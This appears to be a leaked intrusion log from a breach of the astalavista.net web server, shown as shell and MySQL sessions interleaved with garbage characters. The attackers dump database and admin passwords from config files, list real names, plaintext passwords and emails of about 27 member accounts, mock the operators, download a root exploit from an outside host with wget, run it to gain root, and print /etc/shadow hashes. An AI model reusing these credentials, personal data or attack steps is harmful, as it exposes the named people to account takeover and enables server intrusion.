drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner, H9 K$ B, {- @
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
N G' O6 ]2 Bdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config2 l; V7 m- Z9 h$ l# t$ Z2 s
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
$ z; f8 r& C% A7 ddrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
) K7 p8 i# h) c' o/ F# B% d' v-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
- {% h% _+ {5 L-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico, k5 D( _; g$ M6 u& ~
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed: } O. P. P8 c. {
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour& \9 A$ h% J* l+ d2 x9 Q$ t
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
0 T6 b& w+ h; v/ j-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess+ v" Y( o5 f' d) [
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php P9 X! u' \2 u* G* y& K
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
9 {) \3 {1 T) N. ^ R-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php1 O1 d/ B( K7 d; @) c
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
) H# U' ~" H# \5 o3 E8 z-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
2 J8 ~ T7 F9 O# G5 kdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
5 m b, ~4 j$ Z" ? S& Zdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang/ Y( B& f; T2 n3 `
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib# g5 w' g& o( R7 `; v: S, n% n8 F
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log- h1 S R* c, P- ^" s+ v( S
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member7 C4 L u/ \5 r7 b8 G+ r
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata. ?! V- u) ` X: l3 ]" l$ |1 Y
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new% h9 R' t G- d
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf% y+ B% N9 O/ W: a. F( q9 O+ v
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
$ T6 V+ o; t) s2 q' }# k4 |-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt# i1 {. v3 ^: w) Q, ~1 m
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss3 c9 I8 u d' Z
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources1 W/ b% g. H3 p" O/ `
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
$ V% u) V5 T1 J2 \drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
7 ?' @. s- y" D/ B; {- d$ M7 Odrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src4 S5 ]5 `+ D2 @+ H% g, r3 @
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
6 u* E$ ]0 M# Z$ w( \drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
/ x1 X8 E4 e! O7 l: y: Sdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
; o/ w1 n O9 s1 O5 a+ \-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php4 x+ b3 X4 G# l2 x1 q
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki3 f* _/ Z! g7 t" X: j! E: t
5 m7 z; ^% G' w6 ]
sh-3.2$ head -20 index.php
- V$ o9 O7 I; b% Y: y<?PHP, r; Y9 L2 i3 F) b. g- l6 I/ ^
/**
: W, ] y- C" j. ~* Mainfile (external) for astalavistaNET v2.0
! @- v, D' U2 i F+ P/ z*4 E4 X0 f& L' m& m j
* @copyright Astalavista IT Engineering GmbH
$ f. ]$ ^# C( Q* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>. U# ]( p; b4 o
* @version 1.0
* q- {7 O! F' e* m! J" [$ f, C*/
6 }2 z$ S) @6 R1 t% ]- V+ I. f2 H' U$ ^* u
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {5 a2 B! z! Q! U! r. k6 }/ ]
$dontStartSession = false;
/ J% F5 ~- u) y- U. r } else {
B$ ?/ Q: Z. N, o $dontStartSession = true;( z' N) P1 W9 C4 K$ K, T
}- L7 f7 D4 `9 B5 X3 J6 _7 {' X
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);$ d# J5 ]% }/ s* s0 \ {& Z- u; Q+ k
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);) [& w9 ? V0 D9 b9 c
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
/ _% W+ Z6 p {5 Y; ~. _; Z: v require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
) L$ ?4 b- W: t7 |6 L$ q' m( T1 K- u! E" _. {
sh-3.2$ cd config- r U ^% S6 j' \0 l
sh-3.2$ ls -la
3 ]4 E/ i/ w$ r5 s( q6 }total 32
. T) O+ h: ?5 Z( ^& [4 q. bdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .0 L3 s! A( C# M9 r
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
M' J. Y' b+ h5 y5 @( @6 k( X-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
6 b4 v- C) `" e/ R-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php' K+ P& A' i! D
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
; i; i1 M4 z! R) a5 a-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php/ ]2 f. c' V+ w- R q Z" q
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
3 \, w$ ~9 B6 k6 ?
& H' e$ U+ _4 {sh-3.2$ cat com.conf.php4 C; y$ ?. l5 n, p( J1 z
[snip]
/ }& L& ]/ X2 s2 V//member-database
2 m9 ?. r0 M0 ]- C. Y3 Y" k$_CONFIG['db_mem_server'] = ‘localhost’;: E9 H7 C; Q8 B* {1 T2 }) }' y
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;4 @# V7 M6 [) K3 Q, Y }
$_CONFIG['db_mem_user'] = ‘astanet_db’;
- A1 T* j) q. S1 p+ d! [. T- u) i! w$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;) x$ U) U& L2 Y& ?/ l3 P
$_CONFIG['db_mem_debug'] = false; //true or false
! i6 {: |' E3 T- [//ads-database
, }5 A4 G0 B( k0 @+ W+ m3 I* j$_CONFIG['db_ads_server'] = ‘localhost’;
% P* e& b5 ]: P& s; `$_CONFIG['db_ads_database'] = ‘astanet_ads’;
4 x- Z0 p) n& B! c; ~$_CONFIG['db_ads_user'] = ‘astanet_db’;3 ^* @3 y+ _/ |! U
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;) y1 @8 ~6 O- s
$_CONFIG['db_ads_debug'] = false; //true or false
" F+ Z9 T7 T2 P3 Y+ L) d# @* O//rainbow-database
: \. X6 u' M4 V) j$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
3 u" E5 h: b# u$_CONFIG['db_rainbow_database'] = ‘rainbow’;
5 m' z- U1 @" I! Q$_CONFIG['db_rainbow_user'] = ‘dinu’;& y8 i1 i7 R: R( y7 q2 \/ f1 i
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;) g7 s. l5 G6 q- H7 J
$_CONFIG['db_rainbow_debug'] = false; //true or false
4 X7 {+ ^- _ s8 c, u4 }2 u//mailing lists database
/ R( {3 L" Z* w3 h; X! L$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
$ c* O* W& I7 F) l) `$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;! J' G* m' G* N
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
1 @$ ~6 \0 H5 R& Q; J$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
% b* g% c2 E8 l/ @; i$_CONFIG['db_mailing_lists_debug'] = false; //true or false- ^& i+ H) Z) i* D- Y. V3 G; p2 t
//paypal
R0 Y& J# [. |" A) ~/ f$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;7 {6 D4 h) U3 Z% i3 g3 t
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;7 U: }' i6 R- p
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;8 _1 D, ~5 T3 g$ t: Z0 l- b. n
$_CONFIG['sub_pp_noship'] = ‘1′;( h7 p9 w) o& B2 s+ ?9 P7 e$ X: P
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;+ Y8 g: O, m4 M$ M# T
[snip]
% ~* j+ W: t, A6 y
# \ N5 B9 B) {; Qsh-3.2$ cd ..
' D3 p7 }! k' X/ t# g: g8 C7 y% Ash-3.2$ cd member
7 q# S. g0 E7 Rsh-3.2$ ls -la
2 }+ U2 H$ Y, [- t) i; v/ e$ mtotal 20
6 \9 U# X8 R& ?$ S1 j& f3 edrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 ., \0 `! [1 O8 x
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
3 B" ?/ E M3 ~/ }9 K/ s5 _-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
' p$ K: j% p9 K }% q- E-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php8 c1 Z2 r* M4 y( i) x% X8 {& m
sh-3.2$ cat .htaccess
3 O4 f4 o" O% Z" z* N- b5 nSecFilterEngine off [( T" V7 R4 j: g, X2 n# k
, [; ]( c( |% I8 P9 Y9 Gsh-3.2$ cd ..
5 b" z% h% q- s: vsh-3.2$ cd cron
7 G% A+ [/ T5 c& k& E. Bsh-3.2$ ls -la1 i( a9 L& J o
total 168
( p4 A" t% C8 U- k8 p' |2 U2 jdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
; z% v0 ^4 x, U# t$ w0 A; |3 p- Ydrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..) s4 m2 O1 t1 V+ }) Y
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php* _, f1 p4 p- I! v: V
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
# k1 V! t/ X ?-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
0 f6 T6 }( \3 `5 U-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
% K, Y' S$ }% I" I-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php. H2 q, d( u' G6 j' r5 _
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php; Q" `/ h9 b& y7 {0 L( n
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php' Y Q) I4 H1 i$ a
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php% \/ { G8 ^6 ^
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
! y: o* u; s' K7 T* o0 W+ G$ l1 W-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
: s7 D0 C' J' p# }-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
! A; ?: ~! z6 Q7 `0 X" X% P-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php$ p3 \5 L+ m: _2 c: a7 l
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh- F4 a2 D) L: J3 e+ J! ~
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
5 H( a* Q% b5 {* d7 J-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
: Z" v8 t0 x, U' b" f; f0 p+ V-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php- o. l- v' X6 J
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
; N4 G9 x) Q @2 c5 ~1 B-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php; g3 h* p- D: Y, F4 w+ |
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
* c( x7 e8 _( O-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
* s' f+ _# S8 {& B3 j-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php) J% ?/ Y! \* b1 E+ |9 L
* Q, F$ Y- C- ~sh-3.2$ cd ..' p$ k+ ]) F% v9 X
sh-3.2$ cd _0078 r+ Q$ Z4 \: r/ ]. l# m: T! V
sh-3.2$ ls -la: q. J0 g& C! s; ^/ ]1 P
total 24- n6 e% N$ F- q+ X4 f
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
9 `. w5 u# @* s5 ~drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
- H- z% K) g9 O- d3 P2 ~-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess5 N; ^# v1 n3 J1 I3 h+ d8 O1 ?( ^
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php2 R( d2 I y# k- `7 z7 Z. i0 n
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
7 N+ ]- W, Z7 D6 F9 S( [: Ddrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap9 y& d* t* {1 D+ Z6 W) b$ O9 y
6 U Y/ u/ X- }sh-3.2$ cat .htaccess3 z9 Y3 Q2 W4 n* S v; E
authType Basic
: I3 |* F; O& e" O& ^: T/ JauthName Admin
- d* j( d$ n% n# j4 iauthUserFile /home/astanet/auth/.htadm_pwd
% G1 o, S4 w7 L4 n' Orequire valid-user+ M2 j9 {6 G- H: V. T1 w
2 b6 \3 `4 @/ v4 r
sh-3.2$ cat /home/astanet/auth/.htadm_pwd* Z2 P4 k: |/ Y$ E5 I# q1 B
admin2net:CR0bl65MwhfT
2 ?1 i* P+ I: r6 r1 c; x; }
# u) M; F0 C1 a1 @sh-3.2$ mysql -u astanet_db -p
+ ]! e; R6 P7 C; h0 n' o# hEnter password:0 c: v$ j6 G. `2 W% `
Welcome to the MySQL monitor. Commands end with ; or \g.
/ i5 }6 @! j& \! e% mYour MySQL connection id is 275153 {/ g7 P0 J+ x% K7 \
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
2 q5 J2 g. v7 {" @
( F0 a- ^) c% _" Q) z6 S) |' w2 oType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
( M5 o; J, g8 I% y$ e3 m" b5 F* i7 v3 X4 j! k
mysql> show databases;0 g) N8 R" Z- W }8 j. w7 ]9 T% z: f9 u
+———————–+0 w0 H1 g& P) `3 B) Y h
| Database |
2 v) t1 ~3 a* I9 }# i: L+———————–+
7 n) N$ k s$ v. e9 [1 y| information_schema |' g- b8 `: b8 t+ o* q3 V' d& G
| astanet_ads |! m; J9 Y) s1 N: m! k
| astanet_mailing_lists |9 F' x2 `4 O2 g3 G
| astanet_mediawiki |3 y# Y2 ?5 u* G
| astanet_membersystem |/ a8 y/ Q1 _7 t
| test |# M/ i; D9 b0 [9 m
+———————–+0 }7 g3 U4 z' [4 G
6 rows in set (0.00 sec)3 U+ K: |, I' j
4 q2 f3 S* Z" O6 l# I1 {mysql> use astanet_membersystem
: r9 v- B4 E1 F* Y# ?Database changed
+ R, L# E9 H8 vmysql> show tables;$ f. U) x/ y3 Q
+———————————–+
9 a5 N: z) M: Q. h2 G, G| Tables_in_astanet_membersystem |% v& e7 C/ V! h$ C9 o
+———————————–+
A8 B( `4 q$ M| blacklist_categories |
. n, C+ ~# O/ A/ X: O$ @| blacklist_content |! D: Y) m. m" s8 X' c' h
| blacklist_levels |. j" ~0 T' i c& _6 s$ L, X+ }
| blacklist_mcset |
( \7 a; D0 t/ L- t U| dir_categories |
* K" @) z9 S' l1 d; S+ n| dir_comments |
: G U& R# I6 i| dir_links |# s/ g' a& X m! W( Q' B: S' U2 R3 O
| dir_temp |4 B3 G7 x# S( T- D' I [
| dir_votes |
1 {1 k# H# E- }6 R. q| documents |. }. G A+ _, z
| documents_categories |
% @' B* Z7 K! D1 `| email_content |
j. b6 E7 f7 s5 N* c| email_settings |
+ Z6 z$ V- i, ?. A E; a| exploits |0 h1 J: R) X: k7 V+ r
| exploits_categories |" M1 _0 _8 l4 G
| exploittree_categories |
6 f! S7 m; [7 B* I2 u6 c| exploittree_exploits |
6 \' P8 \' V* c% J* P! A| home_values |
' x4 ^# W+ h; X| iso_countries |
! I# }% ~2 V8 t" ^( q8 i| links_categories |% l7 l% Z9 b4 ~3 F r( D+ | ~7 H
| links_records |
* H7 E1 e- D4 I8 S1 y8 U| links_unauth |
& @/ N |% w0 `4 S| links_votes |
$ l L: N, x1 r: C0 @| log |
- n/ Z' a- @% p5 |4 U| news_categories |
: N, H8 W2 _& @9 N6 n5 G, F4 d| news_comments |
# J; ~$ v3 w) C: H1 r2 R& {& m| news_emoticons |6 B# y+ q9 y( G6 L
| news_latest |
- ?$ w; a' Y8 D( @| news_messages |
0 Y4 c4 R, R5 a| news_statistics |3 q2 j+ c' p/ q. L/ t
| news_votes |- X( e. r( j! o1 y, H% a
| prices_content |: Q7 z/ g5 H. @' y: U& G; u
| prices_offers |) j: a' q# [/ c# l
| rss_settings |
2 Y9 E0 k, l7 w7 \| sessions |
Y: S$ b. {: Y( E: _+ P6 ]' w6 M| stats_signups |* r3 {, j/ m8 y
| u2u2 |. p: j. G# Q2 V; s9 k1 e
| u2u_contact |
2 }& k6 @" y- m" ~2 V+ z' _| u2u_settings |( q3 B/ Z' S2 v9 l* L; z' K
| user_keywords_selected_categories |
k" p N- M ~: L) M| users |- ]* }' } V* n. ^; ?" l
| users_ipn_test |
+ ^* y, V) u9 j; S| users_keyword_values |
2 V4 G( t" r% l5 S| users_profile |
3 ]9 U6 G+ `7 t4 Q9 C| users_temp |8 Z- Z$ p9 @- \& Q# F( {
| users_upgrade | C; O9 `% ?, L% R+ T
+———————————–+2 Q! ^! k% |" `0 F: Y8 Z
46 rows in set (0.00 sec)
, T0 E) L* H2 K4 W9 [( U# [% e1 d. }1 o7 S
mysql> describe users;
, {* L6 i1 [$ b5 X; r+————————–+————————————–+——+—–+———————+—————-+/ }! r, ^4 i' h& n/ L/ ?4 m
| Field | Type | Null | Key | Default | Extra |$ N5 V8 B! }9 y9 ~( Z' @
+————————–+————————————–+——+—–+———————+—————-+
6 E! z+ v( j; W( q6 N- C9 t# G| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
8 x, o4 N% L5 |; J9 {/ O0 X| user | varchar(50) | NO | | | |
5 c: e/ ^! v1 o6 O| nickname | varchar(30) | NO | MUL | anonymous | |4 N7 Q/ w- M# m5 e2 F) J7 X
| password | varchar(30) | NO | | | |, S4 o/ Y- f; o8 i# u# E
| userlevel | tinyint(3) | YES | MUL | NULL | |7 v9 R' S F/ D% R2 U4 H* F
| exp | int(8) unsigned | NO | | 0 | |
# o" }6 d2 H2 \4 E| email | varchar(50) | NO | | | |( F/ A# T! R+ o4 x* `6 |
| ip | varchar(15) | NO | | 0 | |3 E. w/ y5 \5 Y" ?6 \2 ]+ ^
| proxy | set(’0′,’1′) | NO | | 0 | |
x0 C9 s; {0 {, I| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |7 \0 Q# ]' e' |
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
4 d! h# b% ?3 t, M5 Y5 v| anz_in | tinyint(1) | NO | | -1 | |
( [- q6 E. {" E+ C" B- l| status | tinyint(1) unsigned | NO | | 0 | |
1 a# n2 E: d. X; M; Z4 Z6 ]- z| checked | set(’0′,’1′,’2′) | NO | | 0 | |
) G) X( v& ?. K- ?2 f| freemember | set(’0′,’1′) | NO | | 0 | |
2 Q U* [8 s% O* T6 G| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
- u/ L& X7 h" q: }# D" Q| lang | tinytext | NO | | | |7 w& l2 O" Q! o% l0 ]7 |) G
| adid | smallint(6) | NO | | 0 | |- z3 A* W: N& {+ e
| pp_txn_id | varchar(255) | YES | | NULL | |
' |# ^1 j' L: [& a. t6 Q| cnb_transaction_id | varchar(255) | YES | | NULL | |' B7 ~ a C1 O/ u( v+ t
| cnb_order_id | varchar(255) | YES | | NULL | |
# j$ C1 {2 y+ e b, `8 _! v' v| cnb_user_id | int(11) | YES | | 0 | |
( _2 z% {- s& K4 Y6 g+————————–+————————————–+——+—–+———————+—————-+
9 ~% |& N* _, P, R @+ U. H" E) V22 rows in set (0.01 sec)! ~/ S; J$ A# N, C- p; w0 X
9 d8 F b) i$ e6 g7 F! h
mysql> select count(*) as skids from users;0 c$ |9 e3 W2 t% @5 V( k" P
+——-+4 C, a/ m# L8 K) T
| skids |
" L% y9 I7 T, k) s* d* X+——-+
; u9 W# V, F; c0 e+ a" K/ q+ e8 ]| 25199 |
, y. d2 b9 u! W1 P/ }& y: A+——-+/ ~2 Q; r& a0 I5 E- T9 G8 R5 v! @
1 row in set (0.00 sec)4 A7 W( j/ Z4 \
8 P4 A+ H: d) L Y. Cmysql> select user,nickname,password,email from users where userlevel = 1;
0 D% G* t, ]+ Y: v) t+————————–+———————-+——————+———————————–+$ ^/ G; V4 n& L; i
| user | nickname | password | email |" J; @* i1 Z- T
+————————–+———————-+——————+———————————–+
/ s9 N/ q5 r+ {| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
6 |9 O. o- d5 X W# G| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |' ^+ F K# z$ I
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |: f$ ]3 h: ?% y7 v. S" M
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |$ h9 ` h, n6 C
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk | H3 O( k- e3 r& N& L6 n7 i" |
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
3 _2 A0 E; D B8 B| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
+ I! @- P" k6 w& [$ D| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |, [2 W* u9 `2 X- T) T
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |8 ^; J2 v9 D& J+ ~8 \
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |, W+ K6 c4 k8 W5 X9 G3 _# e0 v
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
+ G: ^/ j/ {: J/ S9 l, B6 Q| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
$ O6 r. }4 n, F/ @( f| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |* Q; e4 `2 U! Z8 ^) E+ z8 g
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |$ t# Z3 J$ J8 A# ]1 @1 q/ G
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
* n1 F5 c, C4 n0 z/ v1 j| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
6 |! A# r7 D1 D6 _/ r/ e+ S1 Q& v| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
9 S4 E8 X3 f0 [$ d0 Z5 v& I| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |" l* L# E/ R A3 }1 P. M; I
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |6 S8 r' u' k E5 x) X
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
" g) m, ?/ b; I; k| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
, h3 t- e) D) E8 F5 c4 `) w| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com | m) q: G3 X# X) j' i
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
% O% l0 S' W. K T| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |2 Q9 x5 O4 [' P P3 z7 S
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
4 s; |1 w8 H3 S1 {| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
% j, H, W6 F ~" C. U| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
7 L) n; q% ]1 K2 _7 x+————————–+———————-+——————+———————————–+
- y7 ~; K4 |9 k27 rows in set (0.00 sec)
& P& m1 N( z2 F( m1 j
/ l: j, m% n$ o" [; x& F) Wmysql> exit;
* O7 U4 b" g' BBye
4 ^% o0 T, i# E* i a9 s4 ]4 @4 X1 t: J1 n) z' I7 o
[~] plaintext passwords? yes,
. C S- v9 |5 q. ?* BThose so called “security professionals” who charge you $6.66 / month to
: p! D c% C& h2 x3 xregister at their hack-proof portal, save your passwords in plaintext…
U" K) L3 t4 i* y" u- Rbrilliant!8 S0 j- X! [! ?: W& J U
% W/ V$ T5 H$ I6 i, v& r' F1 a
[~] This been fun but we want more.
1 Z1 F7 F: i! g5 g( G3 _& [4 v! U9 E* ~6 U
sh-3.2$ uname -a* t- b0 Z3 o; z/ v4 M1 e# f
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
- U( w4 @/ U; g6 A0 A" D i) I- `sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
1 X& Y, {. H4 ^5 W# _1 F# Z8 Q: A–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
+ X% z# F6 U. x# u. FResolving anti.sec.labs… 13.33.33.37% o, V" S7 C; r, o" b w: @
Connecting to anti.sec.labs|13.33.33.37|:80… connected., G0 l$ e3 c5 n: N
HTTP request sent, awaiting response… 200 OK
- ?; t0 x# s% `. R; z4 L8 \" vLength: 18200 (18K) [text/plain]
9 g7 }& \. {' \ s" c( }- r, q: XSaving to: `g0troot’8 Y! n1 k! R' N3 _ m$ y; k) N
" J* E- s+ D: D
100%[=========================================================================================================================================>] 18,200 58.6K/s in
7 ~, V; y% c9 M( Y5 D) T! d0.3s
6 Z; o$ _7 H/ m- y
; u8 X4 a/ h# k7 w2 j18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]' u1 N0 l: } u; y
' [% P( R4 n: }5 ]7 n2 x3 `
sh-3.2$ ./g0troot -i x86_64 E+ J# D0 F1 H! j% w
[+] g0troot - anti.sec.labs
* f# b7 ~/ A/ U* H1 J4 y+ W[+] Target: 2.6.18-128.1.10.el5- N0 Z* J5 w0 D7 ]) @+ }0 M
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
. L4 q4 [# w. V% X3 z9 @
, f. a2 Y3 @5 T# _1 W, H[+] r00tr00t9 y, m2 S" l7 Z
[~] Executing shell…
0 k$ @, R s5 x. g$ ~% k
$ y8 S! k! _: s, msh-3.2# id
! k$ K6 ]/ j' N6 D+ P7 q9 E5 E& W( Nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+ H, I3 z% R7 ^) M% N. X4 V& t2 L7 Q! M7 S
sh-3.2# cat /etc/shadow
# t! O$ s- x; k% y% Proot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::: z) {4 }8 G/ W# Q. |0 t
[snip]
3 X a5 f( {6 i/ n" W2 gadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::+ t2 M. O6 u; W- G9 ?- v9 ?: p
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::. R1 ^7 Z& B' E
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::' I5 `) |1 c# h1 R
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
/ h0 u- @9 v" {/ g% k/ X
( s5 M' l+ O- w6 M% n/ Ssh-3.2# cat /etc/motd% z- |/ z# d; _3 Y' ?
#####################################################
6 l: H1 ^: r* Y8 e; b; y#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
. R- `2 _. o1 i) n# |__| [__ | |__| | |__| | | | [__ | |__| #
0 { H% Z5 a% y8 d- `# | | ___] | | | |___ | | \/ | ___] | | | #9 s- ^/ X0 \. L5 ~2 ^
# #6 h8 G% b k5 a% B" a
#####################################################- \5 u/ j3 E2 j
# #; z$ k3 j8 t, F) S- N3 D
# Admin Contact - 链接标记support@secureservertech.com # w+ \0 X+ A6 L, H
# #
